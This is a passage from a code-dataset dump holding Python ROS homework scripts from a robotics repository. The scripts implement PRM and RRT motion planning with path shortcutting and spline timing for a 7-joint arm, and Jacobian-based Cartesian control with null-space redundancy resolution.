arr.append(str(numpy.asarray(q_start)))\n\t\t while(len(arr)!=0 and visitmap[str(numpy.asarray(q_goal))]==False):\n\t\t\t#print \"len arr\",len(arr)\n\t\t\t#print \"goal visted?\",visitmap[str(numpy.asarray(q_goal))]\n\t\t\tmindist=disttostartmap[arr[0]]\n\t\t\tmIndext=0\n\t\t\t#find the smallest unknown distance node\n\t\t\tfor i in range(0, len(arr)):\n\t\t\t tempdist=disttostartmap[arr[i]]\n\t\t\t if(tempdist <mindist):\n\t\t\t\tmindist=tempdist\n\t\t\t\tmIndex=i\n\t\t\tv=strmap[arr[mIndext]] #the node has smallest distance to start in the array\n\t\t\tvisitmap[str(v)]=True #mark visited\n\t\t\t#remove this item from the array\n\t\t\tarr.remove(str(v))\n\t\t\tadjlist=adjmap[str(v)] # get the adjacent list\n\t\t\t#print \"v:\",v\n\t\t\t#print \"adjlist\",adjlist\n\t\t\t#update the adjacent node distance to start point\n\t\t\t#print \"adjlist len\", len(adjlist)\n\t\t\tfor j in range(0,len(adjlist)):\n\t\t\t #print \"j\",j\n\t\t\t #if that node is unvisited\n\t\t\t w=adjlist[j]\n\t\t\t w=numpy.asarray(w)\n\t\t\t #print \"w\",w\n\t\t\t #print \"str w\",str(w)\n\t\t\t #print \"strmap \", strmap\n\t\t\t #print \"strmap w\", strmap[str(w)]\n\t\t\t #print \"visitmap[str(w)]\",visitmap[str(w)]\n\t\t\t if(not visitmap[str(w)]):\n\t\t\t\t#print \"w is not visted!\"\n\t\t\t\tolddist=disttostartmap[str(w)]\n\t\t\t\tnewdist=disttostartmap[str(v)]+numpy.linalg.norm(v-w)\n\t\t\t\tif(newdist<olddist):\n\t\t\t\t #update the distance to start point\n\t\t\t\t disttostartmap[str(w)]=newdist\n\t\t\t\t #update the parent node\n\t\t\t\t prevnodemap[str(w)]=str(v)\n\t\t\t #add the connected node to array\n\t\t\t #print \"w\",w\n\t\t\t #print \"arr\",arr\n\t\t\t if (not str(w) in arr):\n\t\t\t\t #print \"w is not in arr\"\n\t\t\t\t arr.append(str(w))\n\t\t\t\t #print \"after append\",arr\n\t\t #check whether there is a path from start to goal\n\t\t if(visitmap[str(numpy.asarray(q_goal))]==True): #there is path from start to goal\n\t\t\tprint \"there is a path from start to goal\"\n\t\t\tnewmindist=disttostartmap[str(numpy.asarray(q_goal))]\n\t\t\tprint \"newmindist\",newmindist\n\t\t\tif(newmindist<min_dist_from_start_goal): #update the path and the mindistance\n\t\t\t print \"update\"\n\t\t\t min_dist_from_start_goal=newmindist\n\t\t\t path=[]\n\t\t\t path.append(q_goal)\n\t\t\t prev=prevnodemap[str(numpy.asarray(q_goal))]\n #print \"prev\",prev\n\t\t\t while (prev != str(numpy.asarray(q_start))):\n\t\t\t\tpath.insert(0,strmap[prev])\n\t\t\t\t#print 
\"prev\",prev\n\t\t\t\tprev=prevnodemap[prev]\n\t\t\t #add the start point\n\t\t\t path.insert(0,q_start)\n\t\t\tprint \"path inside\", path\n\t\t#print \"path\",path\n\t\t#----------------------------------------------------------------------------------\n\t\tif(min_dist_from_start_goal<infinite):\n\t\t taxis.append(time.time()-starttime)\n\t\t y.append(min_dist_from_start_goal)\n\t\tcurrenttime=time.time()\n\t #----------------part1-timeout--------------------------\n\t print \"timeout\"\n\t print \"path final\",path\n\t if (min_dist_from_start_goal<infinite): #if min_dist_from_start_goal<infinite <infinite, there is a path from start to goal\n\t\t#plot \n\t\tfig=plt.figure()\n\t\tplt.plot(taxis,y,'r')\n\t\tplt.xlabel('time')\n\t\tplt.ylabel('shortest path')\n\t\t#plt.ion()\n\t\tplt.show()\n\t\t#time.sleep(5)\n\t\t#plt.close()\n\t else:\n\t\tprint \"PRM :there is no path\"\n\t\tq_list=[]\n\t q_list.append(q_start)\n\t v_list,a_list,t = self.compute_simple_timing(q_list, 10) #v=0, a=0, \n\t return q_list, v_list, a_list, t\n\telse:\t\t\t\t \n\t #RRT-------------------------------------------------------------------\n\t treeList=[] #store tree nodes\n\t prevIndex=[] # store parent nodes index\n\t treeList.append(q_start)\n\t prevIndex.append(-1)\n\t newNode=q_start\n\t count=0\n\t #check whether the start point is valid,if the start point is not valid, then there is not path from start to goal\n\t if (not self.is_state_valid(q_start)):\n\t count=2222\n\t while (not self.is_valid_segment(newNode,q_goal)):\n\t #print \"count\",count #test\n\t if count>2000:\n\t\t break\n\t #create random node\n\t randomNode=numpy.zeros(7)\n for i in range(0,7):\n\t\t randomNode[i]=q_min[i]+(q_max[i]-q_min[i])*random.random()\n\t #print randomNode\n\t #check the randomnode is valid or not\n\t if(self.is_state_valid(randomNode)):\n\t\t minindex=0\n\t\t mindist=numpy.linalg.norm(randomNode-treeList[0])\n\t\t #if vlaid, then find the closet node in the treelist to the random node\n\t\t for j in range(1,len(treeList)):\n\t\t dist=numpy.linalg.norm(randomNode-treeList[j])\n\t\t if(dist<mindist):\n\t\t\t mindist=dist\n\t\t\t minindex=j\n\t\t #create a intended instertnode(may not be inserted)\n\t\t insertNode=treeList[minindex]+0.5*(randomNode-treeList[minindex])/mindist\n\t\t #check this node could be inserted or not\n\t\t if (self.is_valid_segment(treeList[minindex],insertNode)):\n\t\t #if valid, insert the node to the tree, count+1, and update the newNode\n\t\t count=count+1\n\t\t print \"count:\",count\n\t\t print \"insertnode:\",insertNode\n\t\t treeList.append(insertNode)\n\t\t prevIndex.append(minindex)\n\t\t newNode=insertNode\n\t #if count> 2000: didn't find the path, the arm should not move\n\t print \"count\",count\n if count>2000:\n\t if count==2222:\n\t\t print \"the start point is not valid, please restart it\"\n\t q_list=[]\n\t q_list.append(q_start)\n\t v_list,a_list,t = self.compute_simple_timing(q_list, 10) #v=0, a=0, \n\t return q_list, v_list, a_list, t\n\t #if count<2000, find path from the RRT----------------------------------------------------------\n\t print \"treeList\",treeList\n\t print \"prevIndex\",prevIndex\n\t print \"q_start\",q_start\n\t print \"q_goal\",q_goal\n\t path=[]\n\t path.append(q_goal)\n\t prev=len(treeList)-1 #q_goal is the last element in treenode\n\t print \"prev\",prev \n\t while (prev != -1): # if prev=-1, it has get the q_start\n\t path.insert(0,treeList[prev]) #insert before the exist node in path\n\t prev=prevIndex[prev] \n\t print \"un-shortcut path:\",path\n\t 
print \"un-short cut path nodes:\",len(path)\n\t#shortcut the path-------------------------------------------------------------\n\tprint \"before shortcut path\",path\n\tshortcut_path=[]\n\tshortcut_path.append(q_start)\n\tcurrent=0 #index\n\tnext=1# index\n\twhile (current != (len(path)-1)):\n\t #find the farthest node that could conect to the current node\n\t for i in range(current+1, len(path)):\n\t\tif (self.is_valid_segment(path[current],path[i])):\n\t\t next=i\n\t shortcut_path.append(path[next])\n\t current=next\n\tprint \"shortcut path:\",shortcut_path\n\tprint \"short cut path nodes:\",len(shortcut_path)\n\t#resample-----------------------------------------------------------------------------\n\tresample_path=[]\n\tfor i in range(0,len(shortcut_path)-1):\n\t n1=shortcut_path[i]\n\t n2=shortcut_path[i+1]\n\t dist12=numpy.linalg.norm(n2-n1)\n\t num=int(round(dist12/0.5)) #make sure each segment<0.5(could do num+1)\n\t #num must >=1\n\t if num<1:\n\t\t#add the start point and go next, do not resample\n\t\tresample_path.append(shortcut_path[i])\n\t\tcontinue\n\t num=num+1\t\n\t vincrease=(n2-n1)/num #num>=1\n\t print \"vincrease\",numpy.linalg.norm(vincrease) # norm of vincrease should <0.5\n\t for j in range(0,num): #the point in shortcut_path[i+1] is not inserted in the ith loop\n\t\tresample_path.append(n1+j*vincrease)\n\tresample_path.append(q_goal)\n\tprint \"resample path:\",resample_path\n\tprint \"resample_path nodes:\",len(resample_path)\n\t#---------------------------------------------------------------------------------------- \n q_list = resample_path\n print \"q_list:\"\n print q_list\n # A provided convenience function creates the velocity and acceleration data, \n # assuming 0 velocity and acceleration at each intermediate point, and 10 seconds\n # for each trajectory segment.\n v_list,a_list,t = self.compute_simple_timing(q_list, 1)\n\t#calculate acceleration and velocity----------------------------------------------------\n\tnum=len(resample_path) #num of nodes on resample part\n\taT=[]\n\tvT=[]\n\tfor i in range(0,7):\n\t b=numpy.zeros(num)\n\t b[0]=3*(q_list[1][i]-q_list[0][i]) #q_list: n*7\n\t b[num-1]=-3*(q_list[num-1][i]-q_list[num-2][i])\n\t for k in range (1,num-1):\n\t\tb[j]=6*(q_list[k+1][i]+q_list[k-1][i]-2*q_list[k][i])\n\t mat=numpy.zeros((num,num))\n\t mat[0][0]=1\n\t mat[0][1]=0.5\n mat[num-1][num-2]=0.5\n\t mat[num-1][num-1]=1\n\t for j in range (1,num-1):\n\t\tmat[j][j-1]=1\n\t\tmat[j][j]=4\n\t\tmat[j][j+1]=1\n\t invmat=numpy.linalg.inv(mat)\n\t ai=numpy.dot(invmat,b) #n*1 for joint i\n\t aT.append(ai) #aT: 7*n\n\t #calculate vi\n\t vi=numpy.zeros(num)\n\t for m in range(1,num-1):\n\t\tvi[m]=(q_list[m+1][i]-q_list[m][i])-(2*ai[m]+ai[m+1])/6\n\t vT.append(vi) #vT: 7*N\n\ta_list=numpy.transpose(aT) # N*7\n\tv_list=numpy.transpose(vT) # N*7\t\n print \" v_list:\",v_list\n print \" a_list:\",a_list\n print \"t:\"\n print t\n #v_list,a_list,t = self.compute_simple_timing(q_list, 1)\n return q_list, v_list, a_list, t\n # ---------------------------------------------------------------\n\n def project_plan(self, q_start, q_goal, q_min, q_max):\n q_list, v_list, a_list, t = self.motion_plan(q_start, q_goal, q_min, q_max)\n joint_trajectory = self.create_trajectory(q_list, v_list, a_list, t)\n return joint_trajectory\n\n def moveit_plan(self, q_start, q_goal, q_min, q_max):\n self.group.clear_pose_targets()\n self.group.set_joint_value_target(q_goal)\n plan=self.group.plan()\n joint_trajectory = plan.joint_trajectory\n for i in 
range(0,len(joint_trajectory.points)):\n joint_trajectory.points[i].time_from_start = \\\n rospy.Duration(joint_trajectory.points[i].time_from_start)\n return joint_trajectory \n\n def create_trajectory(self, q_list, v_list, a_list, t):\n joint_trajectory = trajectory_msgs.msg.JointTrajectory()\n for i in range(0, len(q_list)):\n point = trajectory_msgs.msg.JointTrajectoryPoint()\n point.positions = list(q_list[i])\n point.velocities = list(v_list[i])\n point.accelerations = list(a_list[i])\n point.time_from_start = rospy.Duration(t[i])\n joint_trajectory.points.append(point)\n joint_trajectory.joint_names = self.joint_names\n return joint_trajectory\n\n def execute(self, joint_trajectory):\n goal = control_msgs.msg.FollowJointTrajectoryGoal()\n goal.trajectory = joint_trajectory\n goal.goal_time_tolerance = rospy.Duration(0.0)\n self.trajectory_client.send_goal(goal)\n self.trajectory_client.wait_for_result()\n\n def move_arm_cb(self, feedback):\n print 'Moving the arm'\n self.mutex.acquire()\n q_start = self.q_current\n T = convert_from_message(feedback.pose)\n print \"Solving IK\"\n q_goal = self.IK(T)\n if len(q_goal)==0:\n print \"IK failed, aborting\"\n self.mutex.release()\n return\n\n print \"IK solved, planning\"\n q_start = numpy.array(self.q_from_joint_state(self.joint_state))\n trajectory = self.project_plan(q_start, q_goal, self.q_min, self.q_max)\n if not trajectory.points:\n print \"Motion plan failed, aborting\"\n else:\n print \"Trajectory received with \" + str(len(trajectory.points)) + \" points\"\n self.execute(trajectory)\n self.mutex.release()\n\n def no_obs_cb(self, feedback):\n print 'Removing all obstacles'\n self.scene.remove_world_object(\"obs1\")\n self.scene.remove_world_object(\"obs2\")\n self.scene.remove_world_object(\"obs3\")\n self.scene.remove_world_object(\"obs4\")\n\n def simple_obs_cb(self, feedback):\n print 'Adding simple obstacle'\n self.no_obs_cb(feedback)\n pose_stamped = geometry_msgs.msg.PoseStamped()\n pose_stamped.header.frame_id = \"base\"\n pose_stamped.header.stamp = rospy.Time(0)\n\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.5, 0.5, 0)) )\n self.scene.add_box(\"obs1\", pose_stamped,(0.1,0.1,1))\n\n def complex_obs_cb(self, feedback):\n print 'Adding hard obstacle'\n self.no_obs_cb(feedback)\n pose_stamped = geometry_msgs.msg.PoseStamped()\n pose_stamped.header.frame_id = \"base\"\n pose_stamped.header.stamp = rospy.Time(0)\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.7, 0.5, 0.2)) )\n self.scene.add_box(\"obs1\", pose_stamped,(0.1,0.1,0.8))\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.7, 0.25, 0.6)) )\n self.scene.add_box(\"obs2\", pose_stamped,(0.1,0.5,0.1))\n\n def super_obs_cb(self, feedback):\n print 'Adding super hard obstacle'\n self.no_obs_cb(feedback)\n pose_stamped = geometry_msgs.msg.PoseStamped()\n pose_stamped.header.frame_id = \"base\"\n pose_stamped.header.stamp = rospy.Time(0)\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.7, 0.5, 0.2)) )\n self.scene.add_box(\"obs1\", pose_stamped,(0.1,0.1,0.8))\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.7, 0.25, 0.6)) )\n self.scene.add_box(\"obs2\", pose_stamped,(0.1,0.5,0.1))\n pose_stamped.pose = convert_to_message( tf.transformations.translation_matrix((0.7, 0.0, 0.2)) )\n self.scene.add_box(\"obs3\", pose_stamped,(0.1,0.1,0.8))\n pose_stamped.pose = convert_to_message( 
tf.transformations.translation_matrix((0.7, 0.25, 0.1)) )\n self.scene.add_box(\"obs4\", pose_stamped,(0.1,0.5,0.1))\n\n def subsample_cb(self, feedback):\n handle = feedback.menu_entry_id\n state = self.menu_handler.getCheckState( handle )\n if state == MenuHandler.CHECKED: \n self.subsample_trajectory = False\n self.spline_timing = False\n print \"Subsample OFF / Spline timing OFF\"\n self.menu_handler.setCheckState( handle, MenuHandler.UNCHECKED )\n self.menu_handler.setCheckState( self.spline_entry, MenuHandler.UNCHECKED )\n else:\n self.subsample_trajectory = True\n print \"Subsample ON\"\n self.menu_handler.setCheckState( handle, MenuHandler.CHECKED )\n self.menu_handler.reApply(self.server)\n self.server.applyChanges()\n\n def spline_cb(self, feedback):\n handle = feedback.menu_entry_id\n state = self.menu_handler.getCheckState( handle )\n if state == MenuHandler.CHECKED: \n self.spline_timing = False\n print \"Spline timing OFF\" \n self.menu_handler.setCheckState( handle, MenuHandler.UNCHECKED )\n else:\n if not self.subsample_trajectory:\n print \"Spline timing only works with subsampled trajectory\"\n else:\n self.spline_timing = True\n print \"Spline timing ON\"\n self.menu_handler.setCheckState( handle, MenuHandler.CHECKED )\n self.menu_handler.reApply(self.server)\n self.server.applyChanges()\n \n def joint_states_callback(self, joint_state):\n self.mutex.acquire()\n self.q_current = joint_state.position\n self.joint_state = joint_state\n self.mutex.release()\n\n def init_marker(self):\n\n self.server = InteractiveMarkerServer(\"control_markers\")\n\n control_marker = InteractiveMarker()\n control_marker.header.frame_id = \"/base\"\n control_marker.name = \"move_arm_marker\"\n\n move_control = InteractiveMarkerControl()\n move_control.name = \"move_x\"\n move_control.orientation.w = 1\n move_control.orientation.x = 1\n move_control.interaction_mode = InteractiveMarkerControl.MOVE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"move_y\"\n move_control.orientation.w = 1\n move_control.orientation.y = 1\n move_control.interaction_mode = InteractiveMarkerControl.MOVE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"move_z\"\n move_control.orientation.w = 1\n move_control.orientation.z = 1\n move_control.interaction_mode = InteractiveMarkerControl.MOVE_AXIS\n control_marker.controls.append(move_control)\n\n move_control = InteractiveMarkerControl()\n move_control.name = \"rotate_x\"\n move_control.orientation.w = 1\n move_control.orientation.x = 1\n move_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"rotate_y\"\n move_control.orientation.w = 1\n move_control.orientation.z = 1\n move_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"rotate_z\"\n move_control.orientation.w = 1\n move_control.orientation.y = 1\n move_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n control_marker.controls.append(move_control)\n\n menu_control = InteractiveMarkerControl()\n menu_control.interaction_mode = InteractiveMarkerControl.BUTTON\n menu_control.always_visible = True\n box = Marker() \n box.type = Marker.CUBE\n box.scale.x = 0.15\n box.scale.y = 0.03\n box.scale.z = 0.03\n 
box.color.r = 0.5\n box.color.g = 0.5\n box.color.b = 0.5\n box.color.a = 1.0\n menu_control.markers.append(box)\n box2 = deepcopy(box)\n box2.scale.x = 0.03\n box2.scale.z = 0.1\n box2.pose.position.z=0.05\n menu_control.markers.append(box2)\n control_marker.controls.append(menu_control)\n\n control_marker.scale = 0.25 \n self.server.insert(control_marker, self.control_marker_feedback)\n\n self.menu_handler = MenuHandler()\n self.menu_handler.insert(\"Move Arm\", callback=self.move_arm_cb)\n obs_entry = self.menu_handler.insert(\"Obstacles\")\n self.menu_handler.insert(\"No Obstacle\", callback=self.no_obs_cb, parent=obs_entry)\n self.menu_handler.insert(\"Simple Obstacle\", callback=self.simple_obs_cb, parent=obs_entry)\n self.menu_handler.insert(\"Hard Obstacle\", callback=self.complex_obs_cb, parent=obs_entry)\n self.menu_handler.insert(\"Super-hard Obstacle\", callback=self.super_obs_cb, parent=obs_entry)\n options_entry = self.menu_handler.insert(\"Options\")\n self.subsample_entry = self.menu_handler.insert(\"Subsample\", parent=options_entry, \n callback=self.subsample_cb)\n self.menu_handler.setCheckState(self.subsample_entry, MenuHandler.CHECKED)\n self.spline_entry = self.menu_handler.insert(\"Spline timing\", parent=options_entry,\n callback = self.spline_cb)\n self.menu_handler.setCheckState(self.spline_entry, MenuHandler.CHECKED)\n self.menu_handler.apply(self.server, \"move_arm_marker\",)\n\n self.server.applyChanges()\n\n Ttrans = tf.transformations.translation_matrix((0.6,0.2,0.2))\n Rtrans = tf.transformations.rotation_matrix(3.14159,(1,0,0))\n self.server.setPose(\"move_arm_marker\", convert_to_message(numpy.dot(Ttrans,Rtrans)))\n self.server.applyChanges()\n\n\nif __name__ == '__main__':\n moveit_commander.roscpp_initialize(sys.argv)\n rospy.init_node('move_arm', anonymous=True)\n ma = MoveArm()\n rospy.spin()\n\n"
},
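
The motion_plan text in the record above implements the PRM query phase with a hand-rolled Dijkstra that linearly scans string-keyed maps for the closest unvisited node. Below is a minimal sketch of the same shortest-path step using Python's heapq, for reference only; the `graph` layout here (node key mapped to a list of (neighbor, cost) pairs) is an assumption for illustration, not the file's actual strmap/adjmap/adjdistmap structures:

    import heapq

    def dijkstra(graph, start, goal):
        # graph: dict mapping node key -> list of (neighbor_key, edge_cost)
        dist = {start: 0.0}
        prev = {}
        heap = [(0.0, start)]
        visited = set()
        while heap:
            d, v = heapq.heappop(heap)
            if v in visited:
                continue
            visited.add(v)
            if v == goal:
                break
            for w, cost in graph.get(v, []):
                nd = d + cost
                if nd < dist.get(w, float('inf')):
                    dist[w] = nd
                    prev[w] = v
                    heapq.heappush(heap, (nd, w))
        if goal not in dist:
            return None  # start and goal lie in different components
        path = [goal]
        while path[-1] != start:
            path.append(prev[path[-1]])  # walk parent pointers back to start
        return path[::-1]

The heap replaces the O(n) minimum search per iteration (and removes the mIndex bookkeeping) while producing the same shortest path over the roadmap.
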
{
"alpha_fraction": 0.5808379054069519,
"alphanum_fraction": 0.5954452157020569,
"avg_line_length": 40.03814697265625,
"blob_id": "fedbb301d2c415b9606396187690d8fb7529418a",
"content_id": "f6c8c68cbbd5d30f12230199268383700a0ebb43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15061,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 367,
"path": "/cartesian control /cartesian_control-3.py",
"repo_name": "MengyuWu/robotics",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport math\nimport numpy\nfrom threading import Thread, Lock\n\nimport geometry_msgs.msg\nfrom interactive_markers.interactive_marker_server import *\nimport rospy\nfrom sensor_msgs.msg import JointState\nimport tf\nfrom urdf_parser_py.urdf import URDF\nfrom visualization_msgs.msg import InteractiveMarkerControl\nfrom visualization_msgs.msg import Marker\n\n# Set this to True if you are doing the extra credit part of the homework,\n# and are tracking both end-effector translation and rotation.\nsixdof = True\n\n# This is the function that must be filled in as part of Homework 2.\n# For a description of the expected code, and detailed information on the\n# function parameters, see the class handout for Lecture 8.\ndef cartesian_control(joint_transforms, \n q_current, q0_desired,\n b_T_ee_current, b_T_ee_desired):\n num_joints = len(joint_transforms)\n dq = numpy.zeros(num_joints)\n #-------------------- Fill in your code here ----version2----------------------\n c_T_b=numpy.linalg.inv(b_T_ee_current) \n current_T_desired=numpy.dot(c_T_b, b_T_ee_desired)\n #print current_T_desired\n DisX=current_T_desired[0:3,3] #translation part\n print \"Disx1:\",DisX\n #method 2 to calculate DisX\n DisX2=b_T_ee_desired[0:3,3]-b_T_ee_current[0:3,3]\n print \"Disx2:\",DisX2\n p=0.4 #0.3\n ee_v_ee=p*DisX #3*1 should use DisX\n #----------------------scale velocity 0.1m/s\n vnorm=numpy.linalg.norm(ee_v_ee)\n print \"vnrom\",vnorm\n if vnorm >0.1:\n\tee_v_ee=ee_v_ee/vnorm*0.1\n #---------------------------------part3-W-----------------------------\n current_R_des=current_T_desired[0:3,0:3]\n angle, axis = rotation_from_matrix(current_R_des)\n #print angle\n #print axis\n p2=0.3\n W=p2*angle*axis\n Wnorm=numpy.linalg.norm(W)\n print \"Wnrom\",Wnorm\n #---------------------------scale W<1 rad/s\n if Wnorm>1:\n\tW=W/Wnorm\n print \"W\",W\n ee_v_ee=numpy.concatenate((ee_v_ee,W)) #6*1\n print \"ee_v_ee:\",ee_v_ee\n J=numpy.zeros((6,num_joints))\n for j in range(0,num_joints): #j from 0 to n-1\n\t#Vj=numpy.zeros((6,num_joints));\n\tb_T_j=joint_transforms[j]\n\tj_T_b=numpy.linalg.inv(b_T_j)\n\tb_T_ee=joint_transforms[num_joints-1]\n\t#b_T_ee=b_T_ee[1]------------------------\n\tj_T_ee=numpy.dot(j_T_b,b_T_ee)\n\tee_T_j=numpy.linalg.inv(j_T_ee)\n\t#calculate Vj component\n\tee_R_j=ee_T_j[0:3,0:3]\n\tj_trans_ee=j_T_ee[0:3,3]\n\tS_j_t_ee=numpy.array([[0,-j_trans_ee[2],j_trans_ee[1]],[j_trans_ee[2],0,-j_trans_ee[0]],[-j_trans_ee[1],j_trans_ee[0],0]])\n\tup_right_Vj=numpy.dot(-ee_R_j,S_j_t_ee)\n #print j_trans_ee\n\t#concatenate small matrixs into large one\n\tVj_upper=numpy.concatenate((ee_R_j,up_right_Vj),axis=1)\n\tVj_down=numpy.concatenate((numpy.zeros((3,3)),ee_R_j),axis=1)\n\tVj=numpy.concatenate((Vj_upper,Vj_down)) #Vj:6*6\n #assgin J[:,j]\n\tJ[:,j]=Vj[:,5]\n #get J upper: \n #print J\n J_upper=J[0:3,:]\n J_upper_pinv=numpy.linalg.pinv(J_upper,1.0e-2)\n #J-pinv\n Jpinv=numpy.linalg.pinv(J,1.0e-2)\n #calculate qdot\n qdot_des=numpy.dot(Jpinv,ee_v_ee)\n dq=qdot_des\n #part 2:\n qdotsec=numpy.zeros(num_joints)\n p1=0.6 #propotion for qdotsec\n q_current0=q_current[0]\n print \"q_current[0]:\",q_current[0]\n print \"q0_desired:\",q0_desired\n qdotsec[0]=p1*(q0_desired-q_current0)\n I=numpy.identity(num_joints)\n N=I-numpy.dot(numpy.linalg.pinv(J),J) #???????????????????????\n #N=I-numpy.dot(Jpinv,J)\n qdotnull=numpy.dot(N,qdotsec)\n dq=dq+qdotnull\n #scale------------------------------1rad/s\n dqnorm=numpy.linalg.norm(dq)\n print \"dqnorm\",dqnorm\n if dqnorm >1:\n\tdq=dq/dqnorm\n 
print \"qdotnull:\",qdotnull\n print \"J*qdotnull\",numpy.dot(J,qdotnull)\n dqnorm=numpy.linalg.norm(dq)\n print \"dqnorm-after-scale\",dqnorm\n print \"dq:\",dq\n #----------------------------------------------------------------------\n return dq\n \ndef convert_to_message(T):\n t = geometry_msgs.msg.Pose()\n position = tf.transformations.translation_from_matrix(T)\n orientation = tf.transformations.quaternion_from_matrix(T)\n t.position.x = position[0]\n t.position.y = position[1]\n t.position.z = position[2]\n t.orientation.x = orientation[0]\n t.orientation.y = orientation[1]\n t.orientation.z = orientation[2]\n t.orientation.w = orientation[3] \n return t\n\n# Returns the angle-axis representation of the rotation contained in the input matrix\n# Use like this:\n# angle, axis = rotation_from_matrix(R)\ndef rotation_from_matrix(matrix):\n R = numpy.array(matrix, dtype=numpy.float64, copy=False)\n R33 = R[:3, :3]\n # axis: unit eigenvector of R33 corresponding to eigenvalue of 1\n l, W = numpy.linalg.eig(R33.T)\n i = numpy.where(abs(numpy.real(l) - 1.0) < 1e-8)[0]\n if not len(i):\n raise ValueError(\"no unit eigenvector corresponding to eigenvalue 1\")\n axis = numpy.real(W[:, i[-1]]).squeeze()\n # point: unit eigenvector of R33 corresponding to eigenvalue of 1\n l, Q = numpy.linalg.eig(R)\n i = numpy.where(abs(numpy.real(l) - 1.0) < 1e-8)[0]\n if not len(i):\n raise ValueError(\"no unit eigenvector corresponding to eigenvalue 1\")\n # rotation angle depending on axis\n cosa = (numpy.trace(R33) - 1.0) / 2.0\n if abs(axis[2]) > 1e-8:\n sina = (R[1, 0] + (cosa-1.0)*axis[0]*axis[1]) / axis[2]\n elif abs(axis[1]) > 1e-8:\n sina = (R[0, 2] + (cosa-1.0)*axis[0]*axis[2]) / axis[1]\n else:\n sina = (R[2, 1] + (cosa-1.0)*axis[1]*axis[2]) / axis[0]\n angle = math.atan2(sina, cosa)\n return angle, axis\n\nclass CartesianControl(object):\n\n #Initialization\n def __init__(self):\n #Loads the robot model, which contains the robot's kinematics information\n self.robot = URDF.from_parameter_server()\n\n #Subscribes to information about what the current joint values are.\n rospy.Subscriber(\"joint_states\", JointState, self.callback)\n\n # Publishes desired joint velocities\n self.pub_vel = rospy.Publisher(\"/joint_velocities\", JointState, queue_size=1)\n\n #This is where we hold the most recent joint transforms\n self.joint_transforms = []\n self.x_current = tf.transformations.identity_matrix()\n\n #Create \"Interactive Marker\" that we can manipulate in RViz\n self.init_marker()\n self.ee_tracking = 0\n self.red_tracking = 0\n self.q_current = []\n\n self.x_target = tf.transformations.identity_matrix()\n self.q0_desired = 0\n\n self.mutex = Lock()\n \n self.timer = rospy.Timer(rospy.Duration(0.1), self.timer_callback)\n\n def init_marker(self):\n\n self.server = InteractiveMarkerServer(\"control_markers\")\n\n control_marker = InteractiveMarker()\n control_marker.header.frame_id = \"/world_link\"\n control_marker.name = \"cc_marker\"\n\n move_control = InteractiveMarkerControl()\n move_control.name = \"move_x\"\n move_control.orientation.w = 1\n move_control.orientation.x = 1\n move_control.interaction_mode = InteractiveMarkerControl.MOVE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"move_y\"\n move_control.orientation.w = 1\n move_control.orientation.y = 1\n move_control.interaction_mode = InteractiveMarkerControl.MOVE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n 
move_control.name = \"move_z\"\n move_control.orientation.w = 1\n move_control.orientation.z = 1\n move_control.interaction_mode = InteractiveMarkerControl.MOVE_AXIS\n control_marker.controls.append(move_control)\n\n move_control = InteractiveMarkerControl()\n move_control.name = \"rotate_x\"\n move_control.orientation.w = 1\n move_control.orientation.x = 1\n move_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"rotate_y\"\n move_control.orientation.w = 1\n move_control.orientation.z = 1\n move_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n control_marker.controls.append(move_control)\n move_control = InteractiveMarkerControl()\n move_control.name = \"rotate_z\"\n move_control.orientation.w = 1\n move_control.orientation.y = 1\n move_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n control_marker.controls.append(move_control)\n\n control_marker.scale = 0.25\n self.server.insert(control_marker, self.control_marker_feedback)\n\n redundancy_marker = InteractiveMarker()\n redundancy_marker.header.frame_id = \"/lwr_arm_1_link\"\n redundancy_marker.name = \"red_marker\"\n rotate_control = InteractiveMarkerControl()\n rotate_control.name = \"rotate_z\"\n rotate_control.orientation.w = 1\n rotate_control.orientation.y = 1\n rotate_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n redundancy_marker.controls.append(rotate_control)\n redundancy_marker.scale = 0.25\n self.server.insert(redundancy_marker, self.redundancy_marker_feedback)\n\n # 'commit' changes and send to all clients\n self.server.applyChanges()\n\n def update_marker(self, T):\n if sixdof:\n self.server.setPose(\"cc_marker\", convert_to_message(T))\n else:\n Ttrans = tf.transformations.translation_matrix(\n tf.transformations.translation_from_matrix(T)\n )\n self.server.setPose(\"cc_marker\", convert_to_message(Ttrans))\n self.server.applyChanges()\n\n def redundancy_marker_feedback(self, feedback): \n if feedback.event_type == feedback.MOUSE_DOWN:\n self.red_tracking = 1\n elif feedback.event_type == feedback.MOUSE_UP:\n self.q0_desired = self.q_current[0]\n self.red_tracking = 0\n if feedback.event_type == feedback.POSE_UPDATE:\n q = feedback.pose.orientation\n qvec = ((q.x, q.y, q.z, q.w))\n R = tf.transformations.quaternion_matrix(qvec)\n angle, direction, point = tf.transformations.rotation_from_matrix(R)\n self.mutex.acquire()\n if abs(self.q0_desired - angle) < 1.0: self.q0_desired = angle\n self.mutex.release()\n\n def control_marker_feedback(self, feedback):\n if feedback.event_type == feedback.MOUSE_DOWN:\n self.ee_tracking = 1\n elif feedback.event_type == feedback.MOUSE_UP:\n self.ee_tracking = 0\n self.x_target = self.x_current\n elif feedback.event_type == 